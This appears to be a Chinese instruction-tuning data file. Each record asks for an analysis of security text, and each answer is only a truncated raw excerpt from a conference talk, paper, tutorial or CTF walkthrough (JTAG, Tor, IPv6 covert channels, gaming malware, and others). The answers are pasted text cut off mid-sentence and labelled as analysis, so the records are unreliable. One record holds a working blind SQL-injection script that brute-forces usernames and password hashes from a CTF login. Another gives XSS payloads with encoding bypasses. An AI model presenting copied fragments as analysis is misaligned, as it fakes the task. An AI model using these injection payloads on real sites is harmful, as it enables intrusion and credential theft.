{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNSA Playset: JTAG Implants Introductory Rites  Electrical Engineering education with focus on CS and Infosec  10 years of fun with hardware o silicon debug o security research o pen testing of CPUs o security training  Hardware Security Training: o Secure RTL design o Low-cost physical attacks o Applied Physical Attacks on x86 Systems Todays Clergy Joe FitzPatrick @securelyfitz joefitz@securinghardware.com Todays Clergy  Degrees in Electrical and Computer Engineering  10+ years designing, implementing, and testing SoC silicon debug features  Hardware and firmware pentesting Matt King @syncsrc jtag@syncsrc.org Introductory Rites Introductory Rites More toys for sale! Sunday at Hacker Warehouse in the vendor area! The Penitence of Godsurge & Fluxbabbit Liturgy of the DWORD: JTAG Joint Test Action Group A reading from IEEE 1149 Remember This? TDI, TDO, TMS, TCK, TRST JTAG Model Physical Layer: Test Access Port TDO unto others As others TDI unto you TAP FSM TDI, TDO, TMS, TCK, TRST JTAG Model Data Link: TAP FSM Data Link: TAP FSM IR/DR access TAP FSM TDI, TDO, TMS, TCK, TRST JTAG Model Network Layer: IRs & DRs Target-specific configuration IR/DR access TAP FSM TDI, TDO, TMS, TCK, TRST JTAG Model Transport Layer: Target-Specific Thats just MIPS. Thats just MIPS. X86 is different ARM is different Each SOC is different Thats just MIPS. X86 is different ARM is different Each SOC is different Romans 12:2 (NIV) Do not conform to the pattern of this world Thats just MIPS. X86 is different ARM is different Each SOC is different Romans 12:2 (NIV) NIH Do not conform to the pattern of this world --- (no one uses this crap) --- N/A - sessionless... Target-specific configuration IR/DR access TAP FSM TDI, TDO, TMS, TCK, TRST JTAG Model A Reading from The second email from Joe to people with JTAG questions Boundary Scan, Run Control, Memory Access --- --- Target-specific configuration IR/DR access TAP FSM TDI, TDO, TMS, TCK, TRST JTAG Model Boundary Scan 30 image from intelletech.com,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPhysical Security (Youre Doing It Wrong) A.P. Delchi Saturday, July 3, 2010 # whois delchi  Infosec Rasputin  Defcon, HOPE, Pumpcon, Skytalks  Minister of Propaganda & Revenge, Attack Research Saturday, July 3, 2010 # whois delchi $DIETY Grant me the serenity to accept people who will not secure their networks, the courage to face them when they blame me for their problems, and the wisdom to go out drinking afterwards Saturday, July 3, 2010 Youre Doing It Wrong A phrase meaning that the method you are using is not creating the desired result Saturday, July 3, 2010 Your MissioN Saturday, July 3, 2010 Your MissioN Design and implement a physical security system for a new facility, to include multi-factor authentication and video surveillance. Saturday, July 3, 2010 Saturday, July 3, 2010 Saturday, July 3, 2010 Saturday, July 3, 2010 Proper Previous Planning Prevents Piss Poor Performance Dick Marcinko, The Rogue Warrior Saturday, July 3, 2010 Physical Security Saturday, July 3, 2010 Physical Security Physical security describes both measures that prevent or deter attackers from accessing a facility, resource, or information stored on physical media and guidance on how to design structures to resist various hostile acts. en.wikipedia.org/wiki/Physical_security Saturday, July 3, 2010 Physical Security Physical security describes both measures that prevent or deter attackers from accessing a facility, resource, or information stored on physical media and guidance on how to design structures to resist various hostile acts. en.wikipedia.org/wiki/Physical_security Measures to reasonably ensure that source or special nuclear material will only be used for authorized purposes and to prevent theft or sabotage. www.nrc.gov/reading-rm/doc-collections/cfr/part110/part110-0002.html Saturday, July 3, 2010 Physical Security Physical security describes both measures that prevent or deter attackers from accessing a facility, resource, or information stored on physical media and guidan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nE nhance S ecurity A w areness w ith D ata M ining Data-driven Intrusion Detection Solutions in Alibaba Cloud Yue Xu (cdxy) Security Engineer @ A lib ab a C loud H an Zheng (LittleH ann) Security Engineer @ A lib ab a C loud M ay 29, 2019 Enhance Security Awareness with Data Mining Data-driven Intrusion Detection Solutions in Alibaba Cloud Han Zheng Security Engineer May 29,2019 Yue Xu Senior Security Engineer Team We are the research-engineering team implementing algorithms and maintaining intrusion detection & threat intelligence to Alibaba Cloud Security Center Han Zheng, Yue Xu, Wei He Cloud + Security Advantages  Data computing ability  Rich security logs  God data vision Challenges  Massive business environment  All manner of adversaries, from 'script kiddies' to nation states  Precision and recall are both concerned Data Flow Table of Threat Modeling Cases  Brute-force Attack  Malicious Behavior Chain  Malicious Web Script (a.k.a webshell)  Attack Payload Backtracking Table of Threat Modeling Cases  Brute-force Attack  Malicious Behavior Chain  Malicious Web Script (a.k.a webshell)  Attack Payload Backtracking Rule-based Decision Problem Features of server login events  Rule-based decision is hard to balance False Positives and True Negative.  Different servers have different behaviors. Prior Knowledge is not adaptive to all cases. Multivariate Gauss Model Find Abnormal Behaviors Gaussian Distribution Table of Threat Modeling Cases  Brute-force Attack  Malicious Behavior Chain  Malicious Web Script (a.k.a webshell)  Attack Payload Backtracking Malicious Behavior Chain Pattern Mining Links of Process/File/Network Entities Generate Strong Association Rules DDG Miner Commands Pattern Matched Table of Threat Modeling Cases  Brute-force Attack  Malicious Behavior Chain  Malicious Web Script (a.k.a webshell)  Attack Payload Backtracking Malicious Web Script Two kinds of malicious PHP script (webshell) Features 01 text 03 dynamic function call 02 opcode Machine Lear", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport requests, string def sql(user, password): print password r=requests.post(\"http://tonnerre.pwning.xxx:8560/login.php\", data={\"username\":user,\"password\":password}) res=r.text print res if res.find(\"unsuccessful\")>-1: return False return True def check_user(prefix): return sql(\"abcdef\", \"' union select user from users where user like '\"+ prefix+\"%' # \") def check_user_password(user, prefix): return sql(\"abcdef\", \"' union select user from users where user='\"+user+\"' and salt like '\"+ prefix+\"%' # \") def check_user_pass(user, prefix): return sql(\"abcdef\", \"' union select user from users where user='\"+user+\"' and pass like '\"+ prefix+\"%' # \") def check_user_verifier(user, prefix): return sql(\"abcdef\", \"' union select user from users where user='\"+user+\"' and verifier like '\"+ prefix+\"%' # \") users=[] def dfs(prefix): ok=False for c in string.lowercase+\"_\": pref=prefix+c if check_user(pref): dfs(pref) ok=True if not ok: users.append(prefix) # dfs(\"\") user=\"get_flag\" def dfs2(prefix): ok=False for c in \"abcdef0123456789\": pref=prefix+c if check_user_password(user, pref): dfs2(pref) ok=True if not ok: print prefix # dfs2(\"\") def dfs3(prefix): ok=False for c in \"abcdef0123456789\": pref=prefix+c if check_user_verifier(user, pref): dfs3(pref) ok=True if not ok: print prefix def dfs4(prefix): ok=False for c in string.lowercase+string.digits: pref=prefix+c if check_user_pass(user, pref): dfs4(pref) ok=True if not ok: print prefix dfs4(\"\")", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 一html, js 的自解码机制 html 的解析顺序html parser --> css parser -->javascript parser `<input type=\"button\" id=\"exec_btn\" value=\"exec\" onclick=\"document.write('<img src=@ onerror=alert(123)>')\" />` 我们可以看到这个button添加了click事件那么当点击按钮的时候会向网页的文档流中插入html代码弹出对话框 ``` javascript <script> function HtmlEncode(str) { var s = \"\"; if (str.length == 0) return \"\"; s = str.replace(/&/g, \"&amp;\"); s = s.replace(/</g, \"&lt;\"); s = s.replace(/>/g, \"&gt;\"); s = s.replace(/\\\"/g, \"&quot;\"); return s; } </script> ``` A: `<input type=\"button\" id=\"exec_btn\" value=\"exec\" onclick=\"document.write (HtmlEncode('&lt;img src=@ onerror=alert(123) /&gt;'))\" />` B: `<input type=\"button\" id=\"exec_btn\" value=\"exec\" onclick=\"document.write (HtmlEncode('<img src=@ onerror=alert(123) />'))\" />` 上面两条的执行结果是一样的都只是在网页中输出了`<img src=@ onerror=alert(123) />` 而没有弹框 只不过A中的js代码在执行前已经先按照html的形式解码了浏览器已经先将 `&lt;img src=@ onerror=alert(123) /&gt;` 解码成 `<img src=@ onerror=alert(123) />`所以他们的执行效果是一样的 关键的问题是这里的js代码是出现在html标签之间的因为嵌入到html标签中的js 代码在解析之前会先按照html规则进行自动解码包括 进制编码&#xH十六进制格式&#D十进制格式 HTML 实体编码下面是 html5 新增的实体编码 &#38;colon; => [冒号] &#38;NewLine; => [换行] case: `<a href=\"javasc&NewLine;ript&colon;alert(1)\">click</a>` 以上是关于js在html内的解码那么假如用户的输入后所传递的值并不是出现在html标签之内而是出现在js中呢 浏览器也有js的解析规则还是举例子来说明 ``` javascript <script> document.write('&lt;img src=@ onerror=alert(123) /&gt;'); </script> ``` 上边的例子会弹出对话框吗?是不会的因为它出现在js代码之中上下文环境为JavaScript浏览器解析前会将出现在js代码中的以下内容编码进行解码 1):UniCode形式(\\uH) ``` javascript <script> document.write('\\u003Cimg src=@ onerror=alert(123) /\\u003E'); </script> ``` 我们发现这个例子弹出对话框了道理是一样的js在执行前已经将特殊字符解码了 2):普通16进制(\\xHH) 或者 8进制(\\[0-7]{1,3}) ``` javascript <script> document.write('\\x3Cimg src=@ onerror=alert(123) /\\x3E'); </script> ``` 3):纯转义如果用户带入js代码的内容中含有 '\"< > 这些字符将他们进行转义是没有意义的还是会原样的输出 看下边的示例: ``` javascript <script> //document.write('\\<img src=@ onerror=alert(123) /\\>'); //弹框 //document.write('te\\'st'); //te'st //document.write('te\\\"st'); //te\"st </script> ``` 由此可知 在js代码中对这些字符转义是没意义的 具有 HtmlEncode 功能的标签 如 &lt;textarea&gt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMalware in the Gaming Micro-economy Zack Allen Rusty Bower Zack & Rusty Background for non-gamers  Non-functional cosmetic items introduced in 2009  In 2010, an update was released that allowed players to trade hats and weapons with each other  This has since been expanded to other games  CS:GO, DOTA, League of Legends Background for non-gamers Background for non-gamers History of Scams History of Scams History of Scams History of Scams How this all started.. Steam User Stats Steampunks - Chasing the Criminals Steampunks - PokeStealer - Attacker runs Auto- Accept Bot - Distributes Stub.exe to victims - With a method of their choosing Steampunks - cursevoice.exe - Installs Curse Voice - Also installs a RAT, giving the attack persistent access to the victims computer Steampunks - mumble - Dropped JavaScript - Anti-analysis protections - Steals private information from browsers - WScript.exe - Installs into Startup Steampunks - raidcall - Dropped JavaScript - QEQWASDFASDF.PNG.EXE tried to sleep 1566864 seconds - Approximately 62 days - Steals private information from browsers - WScript.exe - Installs into Startup Steampunks - YourSpeaks - Unhooks multiple Windows functions - Steals private information from browsers - Installs into autorun - Process Injection - Performs HTTP requests Steampunk - Web TTPs  Attack websites  Phishing  Malware droppers  Both  Domain names split into two categories  Brand abuse  Image website linking to .scr/.jpg/.png but file header is executable Brands  Betting/trades  csgolounge  dota2lounge  backpack.tf  Games  steamcommunity  dota2  csgo  VOIP  mumble  raidcall  ventrilo Valve Responses/Fixes Valve Responses/Fixes Valve Responses/Fixes Valve Responses/Fixes Forecast  Image site homographs/phishing will be weapon of choice  Harder to detect, not clearly abusing a brand  Screenshots will be used consistently by traders/buyers  Malware will be more than just a stealer  Keyloggers, RATs,  More to this market than just virtual items Recommen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"\"\"CVE20209402 URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) \"\"\" from django.contrib import admin from django.urls import path from vuln import views urlpatterns = [ path('admin/', admin.site.urls), path('vuln/', views.vuln), path('vuln2/', views.vuln2), ]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIPv6 is Bad for Your Privacy Janne Lindqvist Helsinki University of Technology Telecommunications Software and Multimedia Laboratory P.O. Box 5400, FIN-02015 TKK, Finland janne.lindqvist@tml.hut.fi Abstract. In recent years, covert channel techniques for IPv4 and more recently for IPv6 have been published by the scientific community and also presented in DEFCON 14. However, a covert channel that contains a considerable bandwidth has been overlooked, the autoconfigured IPv6 address itself. IPv6 Stateless Address Autoconfiguration is used for au- toconfiguring addresses without a server in IPv6 networks. The auto- configuration mechanism consists of choosing an address candidate and verifying its uniqueness with Duplicate Address Detection. The auto- configuration mechanism has privacy issues which have been identified before and mitigations have been published as RFC 3041. However, we show that the privacy protection mechanism for the autoconfiguration can be used as a covert channel, and consequently, be used to harm the privacy of the user. The covert channel can be serious threat for commu- nication security and privacy. We present practical attacks for divulging sensitive information such as parts of secret keys of encryption proto- cols. The scheme can also be used for very effective Big Brother type surveillance that cannot be detected by established intrusion detection systems. 1 Introduction A covert channel is a mechanism that is not designed for communi- cation, but can nonetheless be abused to allow information to be com- municated between parties [2]. Previously, this work has been published as [14], in this version, we take a more tutorial style and present corrections. For example, in [14] we concluded that SEcure Neighbor Discovery (SEND) [3] could prevent this covert channel, but it merely slows it down. Previously published work in TCP/IP covert chan- nels include: how common IPv4 covert channels can be detected and how to implement detection resistant TCP ste", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnonymity Loves Company: Usability and the Network Effect Roger Dingledine and Nick Mathewson The Free Haven Project {arma,nickm}@freehaven.net Abstract. A growing field of literature is studying how usability im- pacts security [4]. One class of security software is anonymizing networks overlay networks on the Internet that provide privacy by letting users transact (for example, fetch a web page or send an email) without re- vealing their communication partners. In this position paper we focus on the network effects of usability on privacy and security: usability is a factor as before, but the size of the user base also becomes a factor. We show that in anonymizing networks, even if you were smart enough and had enough time to use every system perfectly, you would nevertheless be right to choose your system based in part on its usability for other users. 1 Usability for others impacts your security While security software is the product of developers, the security it provides is a collaboration between developers and users. Its not enough to make software that can be used securelysoftware that is hard to use often suffers in its security as a result. For example, suppose there are two popular mail encryption programs: Heavy- Crypto, which is more secure (when used correctly), and LightCrypto, which is easier to use. Suppose you can use either one, or both. Which should you choose? You might decide to use HeavyCrypto, since it protects your secrets better. But if you do, its likelier that when your friends send you confidential email, theyll make a mistake and encrypt it badly or not at all. With LightCrypto, you can at least be more certain that all your friends correspondence with you will get some protection. What if you used both programs? If your tech-savvy friends use HeavyCrypto, and your less sophisticated friends use LightCrypto, then everybody will get as much protection as they can. But can all your friends really judge how able they are? If not, then by suppo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Present & Future of Xprobe2 Founder O F I R A R K I N, F O U N D E R, T H E S Y S  S E C U R I T Y G R O U P  2 0 0 0  2 0 0 3 T H E S Y S  S E C U R I T Y G R O U P Revolutionizing Active Operating System Fingerprinting Ofir Arkin ofir@sys-security.com O F I R A R K I N, F O U N D E R, T H E S Y S  S E C U R I T Y G R O U P  2 0 0 0  2 0 0 3 T H E S Y S  S E C U R I T Y G R O U P 2 Agenda  Introduction  Ofir Arkin  The Xprobe2 project  The Problems/Issues with Active OS fingerprinting  The Remedy I  The Future of Active Operating System Fingerprinting  Demo  Xprobe2 v0.2  Future Work  Questions O F I R A R K I N, F O U N D E R, T H E S Y S  S E C U R I T Y G R O U P  2 0 0 0  2 0 0 3 T H E S Y S  S E C U R I T Y G R O U P 3 Ofir Arkin  CISO of an International Telephone Carrier  Founder, The Sys-Security Group  Computer Security Researcher  Etherleak: Ethernet frame padding information leakage (with Josh Anderson)  IP Telephony Security (Security risk factors with IP Telephony based networks, numerous advisories and white papers)  ICMP Usage In Scanning (Security related issues with the ICMP protocol)  Information Warfare (trace-back)  Member, the Honeynet project O F I R A R K I N, F O U N D E R, T H E S Y S  S E C U R I T Y G R O U P  2 0 0 0  2 0 0 3 T H E S Y S  S E C U R I T Y G R O U P 4 Xprobe/Xprobe2 Project  Open Source Project  Developers  Ofir Arkin  Fyodor Yarochkin  Meder Kydyraliev  Xprobe2 is a remote active operating system fingerprinting tool  Xprobe2 presents an alternative to other remote active operating system fingerprinting tools  Voted one of the top 75 security tools (at the top 50) O F I R A R K I N, F O U N D E R, T H E S Y S  S E C U R I T Y G R O U P  2 0 0 0  2 0 0 3 T H E S Y S  S E C U R I T Y G R O U P 5 Xprobe/Xprobe2 Project History  Initial alpha release (Xprobe v0.0.1) at the Blackhat briefings USA 2001, June 2001  Relying on ICMP-based active OS fingerprinting methods found by Ofir Arkin (specified in the ICMP Usage In Scann", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1590-win-DNS记录获取 ## 来自ATT&CK的描述 在攻击受害者之前攻击者可能会收集有关受害者DNS的信息这些信息可在目标确定期间使用 在域渗透中对域环境的信息搜集很关键如果我们获得了域内管理员的权限那么如何能够快速了解域内的网络架构呢DNS记录无疑是一个很好的参考 ## 测试案例 本文包含以下内容 - 通过dnscmd获取DNS记录 dnscmd用来管理DNS服务器的命令行接口支持远程连接 默认安装的系统 - Windows Server 2003 - Windows Server 2008 - Windows Server 2003 R2 - Windows Server 2008 R2 - Windows Server 2012 - Windows Server 2003 with SP1 -  参考资料 <https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc772069(v=ws.11)> Win7系统在使用时需要安装Remote Server Administration Tools (RSAT) 参考地址 <https://support.microsoft.com/en-us/help/2693643/remote-server-administration-tools-rsat-for-windows-operating-systems> RSAT下载地址 <https://www.microsoft.com/en-us/download/details.aspx?id=7887> ## 检测日志 Windows安全日志 ## 测试复现 ### 常用命令 未能实现三好学生大佬说的效果同样我的Windows server 2008R2并不支持dnscmd这个命令很无奈在Windows server 2016中并没有\".\"值得注意 ```yml C:\\Users\\12306br0>dnscmd ./ZoneInfo 361a.com 指定了未知的命令361a.com -- 键入 DnsCmd -? 在将来的 Windows 版本中Microsoft 可能会删除 dnscmd.exe 如果你当前使用 dnscmd.exe 配置和管理 DNS 服务器 Microsoft 建议你过渡到 Windows PowerShell 若要查看 DNS 服务器管理命令列表请在 Windows PowerShell 提示符处键入 \"Get-Command -Module DnsServer\" 有关适用于 DNS 的 Windows PowerShell 命令的详细信息请参阅 http://go.microsoft.com/fwlink/?LinkId=217627 用法: DnsCmd <ServerName> <Command> [<Command Parameters>] <ServerName>: IP 地址或主机名 -- 远程或本地 DNS 服务器 . -- 本地计算机上的 DNS 服务器 <Command>: /Info -- 获取服务器信息 /Config -- 重置服务器或区域配置 /EnumZones -- 枚举区域 /Statistics -- 查询/清除服务器统计信息数据 /ClearCache -- 清除 DNS 服务器缓存 /WriteBackFiles -- 写入所有区域或根提示数据文件 /StartScavenging -- 开始服务器清理 /IpValidate -- 验证远程 DNS 服务器 /EnumKSPs -- 枚举可用的密钥存储提供程序 /ResetListenAddresses -- 将服务器 IP 地址设置为服务 DNS 请求 /ResetForwarders -- 将 DNS 服务器设置为转发递归查询 /ZoneInfo -- 查看区域信息 /ZoneAdd -- 在 DNS 服务器上创建新区域 /ZoneDelete -- 从 DNS 服务器或 DS 删除区域 /ZonePause -- 暂停区域 /ZoneResume -- 恢复区域 /ZoneReload -- 从其数据库(文件或 DS)重新加载区域 /ZoneWriteBack -- 将区域写回到文件 /ZoneRefresh -- 强制刷新主机的辅助区域 /ZoneUpdateFromDs -- 使用来自 DS 的数据更新 DS 集成区域 /ZonePrint -- 显示区域中的所有记录 /ZoneResetType -- 更改区域类型 /ZoneResetSeco", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPI接口安全checklist 身份认证 不要使用 请使用标准的认证协议如   Basic Auth JWT OAuth 不要重新实现  和 请使用标准库 Authentication token generating password storing 限制密码错误尝试次数并且增加账号冻结功能 加密所有的敏感数据 JWTJSON Web Token 使用随机复杂的密钥 以增加暴力破解的难度 JWT Secret 不要在请求体中直接提取数据要对数据进行加密 或  HS256 RS256 使 token 的过期时间尽量的短   TTL RTTL 不要在 JWT 的请求体中存放敏感数据因为它是  可解码的 OAuth 授权或认证协议 始终在后台验证 只允许白名单的 URL redirect_uri 始终在授权时使用有效期较短的授权码code而不是令牌access_token不允许  response_type=token 使用随机哈希数的 参数来防止跨站请求伪造CSRF state 对不同的应用分别定义默认的作用域和各自有效的作用域参数 访问 限制流量来防止 DDoS 攻击和暴力攻击 在服务端使用 HTTPS 协议来防止 MITM 中间人攻击 使用 协议防止 SSL Strip 攻击 HSTS 输入 使用与操作相符的 HTTP 操作函数   以及 如果请求的方法不适用于请求的资源则返回  GET) POST PUT/ DELETE 405 Method Not Allowed 在请求头中的 字段使用内容验证来只允许支持的格式如  等等并在不满足条件的时候 content-type application/xml application/json 返回  406 Not Acceptable 验证 中申明的编码和你收到正文编码一致如   content-type application/x-www-form-urlencoded multipart/form-data applica 等等 tion/json 验证用户输入来避免一些普通的易受攻击缺陷如  等等 XSS SQL- 不要在 URL 中使用任何敏感的数据   or 而是使用标准的认证请求头 credentials Passwords security tokens API keys 使用一个 API Gateway 服务来启用缓存限制访问速率如   以及动态地部署 APIs Quota Spike Arrest Concurrent Rate Limit resources 处理 检查是否所有的接口都包含必要都身份认证以避免被破坏了的认证体系 避免使用特有的资源 id使用 替代  /me/orders /user/654321/orders 使用 代替自增长的 id UUID 如果需要解析 XML 文件确保实体解析entity parsing是关闭的以避免 攻击 XXE 如果需要解析 XML 文件确保实体扩展entity expansion是关闭的以避免通过指数实体扩展攻击实现的  Billion Laughs/XML bomb 在文件上传中使用 CDN 如果数据处理量很大尽可能使用队列或者 Workers 在后台处理来避免阻塞请求从而快速响应客户端 不要忘了把 DEBUG 模式关掉 输出 增加请求返回头  X-Content-Type-Options: nosniff 增加请求返回头  X-Frame-Options: deny 增加请求返回头  Content-Security-Policy: default-src 'none' 删除请求返回中的指纹头 -   等等 X-Powered-By Server X-AspNet-Version 在响应中遵循请求的 如果你的请求类型是 那么你返回的 就是  content-type application/json content-type application/json 不要返回敏感的数据如    credentials Passwords security tokens 给请求返回使用合理的 HTTP 响应代码如    等等 200 OK 400 Bad Request 401 Unauthorized 405 Method Not Allowed 持续集成和持续部署 使用单元测试以及集成测试的覆盖率来保障你的设计和实现 引入代码审查流程禁止私自合并代码 在推送到生产环境之前确保服务的所有组件都用杀毒软件静态地扫描过包括第三方库和其它依赖 为部署设计一个回滚方案", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA COUP D'ETAT BY A GROUP OF MERCENARY HACKERS Paper by: C Rock and S Mann: Winston Churchill famously said - when the Germans were about to overrun France on one or other of their invasions - \"Gentlemen, do not forget, this is not just about France ... this is about champagne.\" A 'Coup' in France can mean a glass of champagne. A blow. But that is not our subject. We mean Coup d'Etat, putsch, Assisted Regime Change. The Urban Dictionary: \"Coup d'Etat Seizure of power by an armed entity, usually the army but sometimes the police. Usually coups are perpetrated in countries with very weak governments, such as in West Africa, Bolivia, or Southwest Asia. They get progressively worse (i.e., more violent, more prolonged, and more repressive) until eventually some junta builds up protection against the next coup. This is what happened in Iraq after 1979; it happened in Syria in 1973; it also happened in Japan in 1607. In other cases, the coup accomplishes its goals (Chile 1973) and retires as a PR move. Military coups are difficult to pull off and usually are nipped in the bud. Even with foreign assistance, they are hard, because they are a form of high-speed civil war. by Primus Intra Pares July 11, 2010\" So how does this paper define its subject matter, the Coup d'Etat? A blow - a knock out blow - against the existing government of a sovereign state. A blow that puts in place a new government. That blow is the work of a group within the existing state government. They are armed & powerful. This bunch, however, are modern. They are going to use hackers. Putsch? Another word for the same thing. Assisted Regime Change? Perhaps the same thing, but probably very different. Assisted Regime Change can be a euphemism for a Coup or Putsch, or it can be far more insidious. When a democracy votes it may result in a regime change. It's meant to. What if a super power carries out actions to influence an election that does bring down a regime? What if those actions were not overt? What ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCodeQLOpenJDK CodeQL CodeQL Extractor Extractor src.zip CodeQL LGTMCodeQLQL LGTMGitHubWorkflow LGTMOpenJDKDatabase openjdk/jdk8utag ubuntu 16.04 Boot_JDKjdk 1.7.0_80 Target_OpenJDK:OpenJDK 8u73 Boot_JDK tar.gz Boot_JDK jdk-7u80-linux-x64.tar.gz Toolchain # mkdir /usr/lib/jvm tar -zxvf jdk-7u80-linux-x64.gz -C /usr/lib/jvm # vim ~/.bashrc export JAVA_HOME=/usr/lib/jvm/jdk1.7.0_80 export JRE_HOME=${JAVA_HOME}/jre export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib export PATH=${JAVA_HOME}/bin:$PATH # source /.bashrc # JDK update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0_80/bin/java 300 update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk1.7.0_80/bin/javac 300 update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk1.7.0_80/bin/jar 300 update-alternatives --install /usr/bin/javah javah /usr/lib/jvm/jdk1.7.0_80/bin/javah 300 update-alternatives --install /usr/bin/javap javap /usr/lib/jvm/jdk1.7.0_80/bin/javap 300 update-alternatives --config java # java -version apt-get update apt-get upgrade apt-get install -y build-essential gdb cmake cpio file unzip zip wget ccache cmake3.81 OpenJDK & CodeQL apt-get install -y --no-install-recommends libfontconfig1-dev libfreetype6-dev libcups2-dev libx11-dev libxext-dev libxrender-dev libxrandr-dev libxtst-dev libxt-dev libasound2-dev libffi-dev autoconf cd ~/OpenJDK8u73 wget http://ftp.gnu.org/gnu/make/make-3.81.tar.gz && tar -zxvf make-3.81.tar.gz && cd make-3.81 && bash configure -prefix=/usr && make && make install # cmake cmake -v chmod 777 configure ./configure --with-target-bits=64 --with-boot-jdk=/usr/lib/jvm/jdk1.7.0_80 --with- debug-level=slowdebug --enable-debug-symbols ZIP_DEBUGINFO_FILES=0 make all DISABLE_HOTSPOT_OS_VERSION_CHECK=OK ZIP_DEBUGINFO_FILES=0 cd build/linux-x86_64-normal-server-slowdebug/jdk/bin OpenJDKbuildCodeQL CodeQL DatabaseVSCode codeql database create Openjdk8u73_db --language=\"java\" --command=\"make all DISABLE_HOTSPOT_OS_VERSION_CHECK=OK ZIP_DEBUGINFO_FILE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 dradis Framework dradis Framework sharing information will get you root http://dradisframework.org/ Daniel Martín Gómez etd@ngssoftware.com august 2009 2 dradis Framework dradis Framework sharing information will get you root Daniel Martín Gómez etd@ngssoftware.com august 2009 http://dradisframework.org/ Agenda  In the begining, there was nothing  The dradis project  The Framework  Demo 4 dradis Framework In the begining, there was nothing 5 In the begining, there was nothing Information Discovery  port scan  vuln. scan  web app scan  ... 6 In the begining, there was nothing Information Discovery  port scan  vuln. scan  web app scan  ... Exploiting  metasploit  milw0rm  ... 7 In the begining, there was nothing Information Discovery  port scan  vuln. scan  web app scan  ... Exploiting  metasploit  milw0rm  ...  word  pdf tools  ... Reporting 8 In the begining, there was nothing Information Discovery Exploiting Reporting What about sharing the information? 9 In the begigin, there was nothing Why do we need THAT? 10 why do we need it? 11 why do we need it? 12 why do we need it? Scheduling Madness Agenda  In the begining, there was nothing  The dradis project 14 dradis Framework The dradis project  Project goals  Technology behind the scenes  Evolution  Why dradis? 15 The dradis project Project goals 16 The dradis project 4 goals for the project  share information effectively 17 The dradis project 4 goals for the project  share information effectively  easy to use and adopt 18 The dradis project 4 goals for the project  share information effectively  easy to use and adopt  flexibility 19 The dradis project 4 goals for the project  share information effectively  easy to use and adopt  flexibility  small and portable 20 dradis Framework The dradis project  Project goals  Technology behind the scenes 21 dradis Framework Technology behind the scenes 22 Technology behind the scenes Database REST Web 23 dradis Framework The dradis project  Project goals  Technology behind t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Glasglow 1.1 > https://download.vulnhub.com/glasgowsmile/GlasgowSmile-v1.1.zip 靶场IP`192.168.32.222` 扫描对外端口服务 ``` (rootkali)-[~] # nmap -p 1-65535 -sV 192.168.32.222 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 10:00 EDT Nmap scan report for 192.168.32.222 Host is up (0.00036s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 00:0C:29:96:C2:2B (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds ``` 访问80端口 ![image-20220910220047299](../../.gitbook/assets/image-20220910220047299.png) 爆破目录 ``` ``` 访问`/joomla` ![image-20220910232218861](../../.gitbook/assets/image-20220910232218861.png) 使用\" **joomscan** \"并列出版本有趣的目录备份文件或可以帮助我们识别某些漏洞的东西了 ``` (rootkali)-[~] # joomscan -u http://192.168.32.222/joomla/ ____ _____ _____ __ __ ___ ___ __ _ _ (_ _)( _ )( _ )( \\/ )/ __) / __) /__\\ ( \\( ) .-_)( )(_)( )(_)( ) ( \\__ \\( (__ /(__)\\ ) ( \\____) (_____)(_____)(_/\\/\\_)(___/ \\___)(__)(__)(_)\\_) (1337.today) --=[OWASP JoomScan +---++---==[Version : 0.0.7 +---++---==[Update Date : [2018/09/23] +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo --=[Code name : Self Challenge @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP Processing 